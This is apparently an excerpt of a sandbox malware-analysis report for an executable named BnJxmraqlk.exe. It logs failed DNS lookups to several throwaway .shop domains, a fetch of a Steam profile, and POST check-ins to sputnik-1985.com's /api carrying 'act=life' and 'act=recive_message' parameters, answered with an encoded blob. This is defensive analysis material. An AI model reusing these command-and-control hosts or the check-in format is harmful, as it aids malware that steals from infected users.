                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.126174927 CET192.168.2.61.1.1.10xd99aStandard query (0)tirepublicerj.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.138060093 CET192.168.2.61.1.1.10x4248Standard query (0)noisycuttej.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.146375895 CET192.168.2.61.1.1.10x1de7Standard query (0)rabidcowse.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.161242008 CET192.168.2.61.1.1.10x11faStandard query (0)cloudewahsj.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.169461966 CET192.168.2.61.1.1.10xcce7Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.472965956 CET192.168.2.61.1.1.10x6d05Standard query (0)sputnik-1985.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.076066971 CET1.1.1.1192.168.2.60xfb0Name error (3)spottercurvei.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.088212967 CET1.1.1.1192.168.2.60xdf85Name error (3)nearycrepso.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.100774050 CET1.1.1.1192.168.2.60x68f1Name error (3)abruptyopsn.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.113485098 CET1.1.1.1192.168.2.60x1cc7Name error (3)wholersorie.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.125125885 CET1.1.1.1192.168.2.60x9388Name error (3)framekgirus.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.136997938 CET1.1.1.1192.168.2.60xd99aName error (3)tirepublicerj.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.145508051 CET1.1.1.1192.168.2.60x4248Name error (3)noisycuttej.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.160202980 CET1.1.1.1192.168.2.60x1de7Name error (3)rabidcowse.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.168483019 CET1.1.1.1192.168.2.60x11faName error (3)cloudewahsj.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:02.177026033 CET1.1.1.1192.168.2.60xcce7No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.505980968 CET1.1.1.1192.168.2.60x6d05No error (0)sputnik-1985.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.505980968 CET1.1.1.1192.168.2.60x6d05No error (0)sputnik-1985.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.505980968 CET1.1.1.1192.168.2.60x6d05No error (0)sputnik-1985.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.505980968 CET1.1.1.1192.168.2.60x6d05No error (0)sputnik-1985.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.505980968 CET1.1.1.1192.168.2.60x6d05No error (0)sputnik-1985.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.505980968 CET1.1.1.1192.168.2.60x6d05No error (0)sputnik-1985.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Jan 7, 2025 13:17:03.505980968 CET1.1.1.1192.168.2.60x6d05No error (0)sputnik-1985.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                                          • sputnik-1985.com
                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          0192.168.2.649713104.102.49.254443612C:\Users\user\Desktop\BnJxmraqlk.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-07 12:17:02 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                          2025-01-07 12:17:03 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 12:17:03 GMT
                                                                                                                                                                                                                          Content-Length: 35126
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: sessionid=52850c8b532753f67b1830b1; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                          2025-01-07 12:17:03 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                          2025-01-07 12:17:03 UTC16384INData Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
                                                                                                                                                                                                                          Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
                                                                                                                                                                                                                          2025-01-07 12:17:03 UTC3768INData Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
                                                                                                                                                                                                                          Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
                                                                                                                                                                                                                          2025-01-07 12:17:03 UTC495INData Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                          Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          1192.168.2.649714104.21.48.1443612C:\Users\user\Desktop\BnJxmraqlk.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-07 12:17:04 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-07 12:17:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                          2025-01-07 12:17:04 UTC1116INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 12:17:04 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=8mtstinu5df2gpldh5b302mf6a; expires=Sat, 03 May 2025 06:03:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jxXGFdFwOgIkfhZrZGTgF5BCn9IgdN31ubMmkBif4Lh72HGk4gDOq59tp7IAiKBWbWRqVlO3wiKmEb5Pv4XMdJK9NLpZh0Sln1oJRwPm1V3Z4M%2FQDUVNkUzku8bKFycRAetj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8fe3e1f09f568cda-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1963&rtt_var=981&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4218&recv_bytes=907&delivery_rate=394434&cwnd=242&unsent_bytes=0&cid=6f312a66f674e6ea&ts=341&x=0"
                                                                                                                                                                                                                          2025-01-07 12:17:04 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                          2025-01-07 12:17:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          2192.168.2.649716104.21.48.1443612C:\Users\user\Desktop\BnJxmraqlk.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-07 12:17:04 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-07 12:17:04 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 63 51 6c 30 6d 2d 2d 26 6a 3d
                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=hcQl0m--&j=
                                                                                                                                                                                                                          2025-01-07 12:17:05 UTC1117INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 12:17:05 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=5itlf71d2031co2sq1ofosplg5; expires=Sat, 03 May 2025 06:03:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lb%2FIfk9TLNPFYt3n2jKym5r4UwPKiqTIZqStsFZ89ZjYiEqD3HrnL3U1PUsiR8E19vosXUhJDUtMwwAhD9ZhS4P95lQAF2ob9FKM2Ag4txqo7hg7bTsqdTiIjpE9gRmB1QEW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8fe3e1f5efe48c15-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1801&rtt_var=701&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=942&delivery_rate=1534419&cwnd=238&unsent_bytes=0&cid=d412294e2e715a6c&ts=478&x=0"
                                                                                                                                                                                                                          2025-01-07 12:17:05 UTC252INData Raw: 32 64 33 38 0d 0a 59 44 68 58 33 66 7a 2f 6e 37 71 37 66 7a 50 31 58 4d 77 51 35 73 66 4a 61 78 54 67 6d 2f 33 7a 38 2f 64 47 32 64 35 56 53 48 38 62 47 69 48 2f 78 73 75 7a 6d 4d 67 61 45 63 38 6f 76 6d 57 44 36 2b 73 4b 63 4d 4b 68 6d 35 4b 66 68 43 50 31 2f 43 4d 6c 58 56 70 65 4e 72 47 50 6d 72 4f 59 33 67 63 52 7a 77 65 33 4d 6f 4f 70 36 31 45 32 68 66 47 66 6b 70 2b 56 4a 37 4b 78 4a 53 51 63 43 46 51 77 74 5a 6d 63 2b 39 76 58 45 6c 61 51 4f 61 31 36 69 4b 36 6b 41 33 6e 43 74 39 2b 57 69 64 56 38 2b 35 4d 77 50 42 34 74 57 53 53 32 33 6f 4b 7a 77 5a 6b 61 58 64 64 6d 37 6e 47 44 70 61 55 4e 63 49 76 7a 6c 5a 75 58 6c 43 4b 7a 72 6a 77 75 46 77 68 61 4d 37 53 54 6c 65 2f 57 33 52 56 64 6c 6a 4f 74 4d 73 72 6c 72 42 45 32 32 72 6e 4d 6f 35
                                                                                                                                                                                                                          Data Ascii: 2d38YDhX3fz/n7q7fzP1XMwQ5sfJaxTgm/3z8/dG2d5VSH8bGiH/xsuzmMgaEc8ovmWD6+sKcMKhm5KfhCP1/CMlXVpeNrGPmrOY3gcRzwe3MoOp61E2hfGfkp+VJ7KxJSQcCFQwtZmc+9vXElaQOa16iK6kA3nCt9+WidV8+5MwPB4tWSS23oKzwZkaXddm7nGDpaUNcIvzlZuXlCKzrjwuFwhaM7STle/W3RVdljOtMsrlrBE22rnMo5
                                                                                                                                                                                                                          2025-01-07 12:17:05 UTC1369INData Raw: 4b 45 4e 61 36 78 4a 79 78 64 48 52 51 73 2f 35 6d 52 76 59 43 5a 46 56 32 5a 4f 36 31 39 67 36 53 72 47 33 6d 43 2b 70 65 5a 6c 5a 38 72 74 4c 4d 35 49 42 6f 4b 55 7a 4b 77 6d 5a 58 37 31 39 70 64 48 39 63 35 74 6a 4c 63 35 59 73 5a 64 59 48 74 6b 6f 44 52 69 6d 71 69 2f 44 41 6d 58 56 6f 61 4d 37 47 66 6b 50 33 4b 30 52 5a 61 6b 69 79 6c 65 34 6d 6f 71 77 52 38 6a 66 71 66 6c 70 75 66 4b 37 47 34 4f 69 63 62 41 6c 70 31 38 64 36 61 35 5a 69 42 58 58 4b 53 4c 71 6c 2b 6b 75 65 52 53 57 6e 4d 34 4e 2b 57 6e 64 56 38 2b 37 51 79 4b 52 34 4a 56 54 61 33 6c 59 2f 39 79 74 38 51 56 49 55 34 71 33 79 4f 70 72 6b 44 65 49 54 36 6c 70 71 59 6b 43 4f 2f 2f 48 6c 71 47 68 6f 61 62 66 2b 2f 6b 50 62 55 30 77 70 52 31 79 48 67 61 38 53 69 70 30 6b 75 77 76 32 65 6c
                                                                                                                                                                                                                          Data Ascii: KENa6xJyxdHRQs/5mRvYCZFV2ZO619g6SrG3mC+peZlZ8rtLM5IBoKUzKwmZX719pdH9c5tjLc5YsZdYHtkoDRimqi/DAmXVoaM7GfkP3K0RZakiyle4moqwR8jfqflpufK7G4OicbAlp18d6a5ZiBXXKSLql+kueRSWnM4N+WndV8+7QyKR4JVTa3lY/9yt8QVIU4q3yOprkDeIT6lpqYkCO//HlqGhoabf+/kPbU0wpR1yHga8Sip0kuwv2el
                                                                                                                                                                                                                          2025-01-07 12:17:05 UTC1369INData Raw: 38 70 48 64 79 58 53 68 5a 49 62 79 55 33 38 6a 62 31 78 4e 57 67 58 36 78 50 4a 33 6c 72 41 55 32 32 72 6d 53 6b 4a 6d 54 4e 72 53 78 4e 43 51 54 44 56 38 36 74 35 36 64 38 4e 33 64 46 6c 71 55 4d 36 70 67 6a 71 57 6a 44 48 65 49 38 39 2f 66 30 5a 49 38 2b 2b 52 33 47 77 6f 4a 47 41 43 38 6b 4a 50 36 7a 70 6b 43 48 34 35 2b 71 58 37 45 2f 65 73 45 66 6f 66 38 6b 4a 43 62 6d 79 47 78 73 44 38 6b 48 68 42 56 4d 62 2b 53 6c 66 66 56 31 78 6c 5a 6e 6a 57 6c 64 49 53 6b 6f 55 6b 34 77 76 36 48 30 63 6e 56 45 4c 79 77 4f 69 56 66 4e 31 6b 37 73 5a 6d 4c 76 63 65 58 42 42 47 51 4d 75 34 71 78 4b 6d 69 43 58 32 49 2f 5a 2b 57 6e 4a 41 6e 76 4c 38 36 4c 52 63 4d 58 54 47 7a 6c 35 44 37 32 4e 34 5a 56 49 55 37 70 33 36 49 35 65 56 4a 63 5a 71 35 78 39 47 2b 6b 6a
                                                                                                                                                                                                                          Data Ascii: 8pHdyXShZIbyU38jb1xNWgX6xPJ3lrAU22rmSkJmTNrSxNCQTDV86t56d8N3dFlqUM6pgjqWjDHeI89/f0ZI8++R3GwoJGAC8kJP6zpkCH45+qX7E/esEfof8kJCbmyGxsD8kHhBVMb+SlffV1xlZnjWldISkoUk4wv6H0cnVELywOiVfN1k7sZmLvceXBBGQMu4qxKmiCX2I/Z+WnJAnvL86LRcMXTGzl5D72N4ZVIU7p36I5eVJcZq5x9G+kj
                                                                                                                                                                                                                          2025-01-07 12:17:05 UTC1369INData Raw: 49 78 51 51 56 44 75 32 6b 35 76 31 33 39 63 51 57 70 45 31 71 58 57 43 71 4b 4d 45 63 34 48 34 6d 35 75 44 6c 69 2b 78 73 54 31 71 55 30 4a 64 4c 66 2f 47 33 64 72 55 38 41 31 4b 68 53 6a 75 62 63 71 38 36 77 35 36 77 71 48 66 6b 70 36 63 4b 37 4f 30 4f 43 55 5a 44 46 77 7a 73 70 75 53 39 38 72 52 45 31 79 63 4d 61 56 67 68 4b 69 76 42 58 4b 4b 38 70 58 52 33 39 55 6a 6f 2f 78 76 61 69 67 50 56 54 57 38 69 4e 33 69 6c 73 42 64 56 70 74 2b 39 6a 4b 49 71 36 73 47 65 6f 37 79 6c 35 43 64 6d 79 4f 2b 74 54 38 69 44 77 4e 65 50 62 36 51 6b 76 7a 63 33 42 68 56 6b 44 71 6f 66 63 54 72 36 77 35 75 77 71 48 66 76 72 61 67 5a 70 71 47 64 7a 56 54 47 78 6f 79 73 39 37 46 76 64 54 61 45 56 6d 59 4f 4b 64 2b 6a 71 79 67 42 58 32 47 39 5a 61 55 6c 35 51 68 76 72 30
                                                                                                                                                                                                                          Data Ascii: IxQQVDu2k5v139cQWpE1qXWCqKMEc4H4m5uDli+xsT1qU0JdLf/G3drU8A1KhSjubcq86w56wqHfkp6cK7O0OCUZDFwzspuS98rRE1ycMaVghKivBXKK8pXR39Ujo/xvaigPVTW8iN3ilsBdVpt+9jKIq6sGeo7yl5CdmyO+tT8iDwNePb6Qkvzc3BhVkDqofcTr6w5uwqHfvragZpqGdzVTGxoys97FvdTaEVmYOKd+jqygBX2G9ZaUl5Qhvr0
                                                                                                                                                                                                                          2025-01-07 12:17:05 UTC1369INData Raw: 46 51 34 73 4a 61 56 39 4e 6e 64 47 46 79 52 4d 71 52 7a 67 36 75 6c 41 54 62 4d 75 5a 69 4a 30 63 31 6b 6d 71 77 73 4f 41 73 50 65 7a 69 77 33 6f 4b 7a 77 5a 6b 61 58 64 64 6d 37 6e 75 57 6f 61 59 62 66 34 58 33 6b 4a 4b 44 6c 43 6d 77 72 6a 41 6c 47 51 56 57 4d 37 43 59 6e 50 6a 53 31 52 70 55 6e 44 47 69 4d 73 72 6c 72 42 45 32 32 72 6d 78 6d 6f 4b 43 4a 37 57 33 49 54 46 64 48 52 51 73 2f 35 6d 52 76 59 43 5a 48 6c 71 63 4f 71 35 2b 68 4b 47 6d 43 57 53 4e 2f 70 69 59 6d 6f 63 75 76 4c 73 38 49 68 59 4e 58 43 65 7a 6b 49 2f 34 79 73 74 64 48 39 63 35 74 6a 4c 63 35 5a 30 4f 5a 70 4c 36 33 61 43 48 6c 6a 4b 77 73 54 74 71 41 6b 78 44 64 62 69 53 33 61 57 59 33 78 4a 59 6c 44 47 76 65 34 69 6f 72 67 42 7a 67 2f 2b 62 6d 35 75 56 49 72 32 39 4d 69 41 65
                                                                                                                                                                                                                          Data Ascii: FQ4sJaV9NndGFyRMqRzg6ulATbMuZiJ0c1kmqwsOAsPeziw3oKzwZkaXddm7nuWoaYbf4X3kJKDlCmwrjAlGQVWM7CYnPjS1RpUnDGiMsrlrBE22rmxmoKCJ7W3ITFdHRQs/5mRvYCZHlqcOq5+hKGmCWSN/piYmocuvLs8IhYNXCezkI/4ystdH9c5tjLc5Z0OZpL63aCHljKwsTtqAkxDdbiS3aWY3xJYlDGve4iorgBzg/+bm5uVIr29MiAe
                                                                                                                                                                                                                          2025-01-07 12:17:05 UTC1369INData Raw: 2f 47 33 66 37 66 32 68 78 62 6e 6a 4b 68 64 59 43 33 6f 51 35 6b 67 2f 69 55 6e 4a 32 56 4b 62 61 32 4e 69 4d 51 44 6c 63 79 75 4a 47 59 76 5a 61 5a 47 6b 6e 58 5a 75 35 54 69 61 36 6e 55 69 7a 43 35 74 47 49 30 5a 49 6f 2b 2b 52 33 4b 68 63 48 55 44 69 38 6b 5a 37 76 32 64 38 50 55 5a 6f 30 76 48 69 50 6f 4b 59 45 65 34 48 2f 6d 5a 71 64 68 79 32 37 76 7a 78 71 55 30 4a 64 4c 66 2f 47 33 64 37 50 7a 78 64 57 6d 79 69 6c 63 34 65 7a 70 68 6b 32 7a 4c 6d 4f 6c 6f 44 56 66 4b 32 73 49 43 30 43 54 45 4e 31 75 4a 4c 64 70 5a 6a 66 46 46 65 51 4f 4b 42 67 67 61 4f 6b 42 6e 2b 4c 2f 5a 65 53 6b 5a 45 67 76 4c 6b 30 4a 68 59 46 57 54 71 37 6c 35 50 30 31 35 6c 54 45 5a 41 6d 37 69 72 45 68 4c 41 4b 65 6f 2b 35 67 4e 2b 49 31 53 4f 33 2f 47 39 71 45 51 78 66 4e
                                                                                                                                                                                                                          Data Ascii: /G3f7f2hxbnjKhdYC3oQ5kg/iUnJ2VKba2NiMQDlcyuJGYvZaZGknXZu5Tia6nUizC5tGI0ZIo++R3KhcHUDi8kZ7v2d8PUZo0vHiPoKYEe4H/mZqdhy27vzxqU0JdLf/G3d7PzxdWmyilc4ezphk2zLmOloDVfK2sIC0CTEN1uJLdpZjfFFeQOKBggaOkBn+L/ZeSkZEgvLk0JhYFWTq7l5P015lTEZAm7irEhLAKeo+5gN+I1SO3/G9qEQxfN
